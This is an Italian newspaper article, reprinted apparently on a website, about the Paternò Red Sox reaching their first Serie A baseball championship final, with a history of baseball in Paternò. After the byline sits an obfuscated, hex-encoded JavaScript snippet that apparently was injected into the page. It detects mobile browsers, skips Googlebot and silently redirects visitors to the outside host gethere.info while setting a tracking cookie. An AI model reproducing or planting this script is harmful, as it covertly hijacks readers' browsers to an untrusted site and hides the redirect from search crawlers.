PATERNO’ RED SOX NELLA STORIA CENTRATA LA FINALE SCUDETTO Nella semifinale dei play off battuto l’ Imola in trasferta. Il manager Messina “Adesso la sfida tricolore con gli iridati del Bollate”

red-sox-imola

Che impresa. I Paternò Red Sox entrano nella storia del baseball siciliano centrando per la prima volta la finale scudetto del campionato federale di Serie A. La squadra del manager Riccardo Messina dopo una prima fase da incorniciare, sono stati straordinari protagonisti nella seconda fase chiudendo al secondo posto nel proprio girone, centrando la semifinale scudetto giocata ieri in maniera impeccabile in trasferta a Imola, dove è  arrivato un successo che ha regalato una storica finale scudetto.

“La finale scudetto della Serie A federale non è più un miraggio per la nostra squadra – gridano soddisfatti i dirigenti della squadra paternese – grazie al doppio e meritato successo in trasferta contro l’Imola che adesso ci permetterà di giocare la finale scudetto contro i campioni in carica del Bollate”.

Una sfida tricolore che si giocherà al meglio delle 5 partite da disputare prima in Lombardia e poi come atto finale in Sicilia.

Le due partite di semifinale hanno visto i Paternò Red Sox concentratissimi in tutti i settori. La vittoria in gara-1 di sabato scorso, ha visto in primo piano il formidabile cubano Franklyn Torres che ha consentito al manager Riccardo Messina di preservare il pitcher cubano Wilber Perez per i 4 inning finali in gara-2 di ieri, aperta magistralmente da Salvatore Sciacca che per 5 inning ha tenuto a zero le mazze dei padroni di casa.

“Adesso manca un ultimo passo verso quello che ad inizio stagione sembrava soltanto un sogno – ci dice soddisfatto il manager Riccardo Messina – e a questo punto però ci proveremo fino alla fine – perchè abbiamo preso coscienza della forza e della compattezza della nostra squadra”.

Il baseball è arrivato a Paternò il 4 Luglio del 1969 grazie ad un ragazzo dodicenne, Massimo Messina, il quale vide per la prima volta una partita di baseball alla base militare staunitense di Sigonella e nacque così nel 1970 a Paternò la Libertas Itala e da quel momento il baseball diventò uno degli sport principali a Paternò.

Nel 1983 nacque anche la Polisportiva Warriors che portò il baseball siciliano ai massimi livelli e in A1 fino al 2000. Nel 1992 erano invece nati i Paternò Dodgers, società satellite dei Warriors e, nel 2008, il Farm System dei Warriors si ingrandisce con i Paternò Red Sox e comincia una nuova storia sportiva paternese nel baseball, fino ad arrivare al 2010 col tricolore under 12 dei Dodgers. Nel 2011 e  nel 2012 i Red Sox partecipno alla serie C conquistando la promzione in serie B, ma è costretta a rinunciare al torneo cadetto per problemi economici. Nel 2013 con enormi sforzi economici della società e di enormi sacrifici da parte di allenatori e giocatori, i Paternò Red Sox partecipano alla Serie B, per arrivare poi in Serie A e adesso giocare la finale scudetto.

LORENZO MAGRI’

da “La Sicilia” del 19/09/2016

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedIn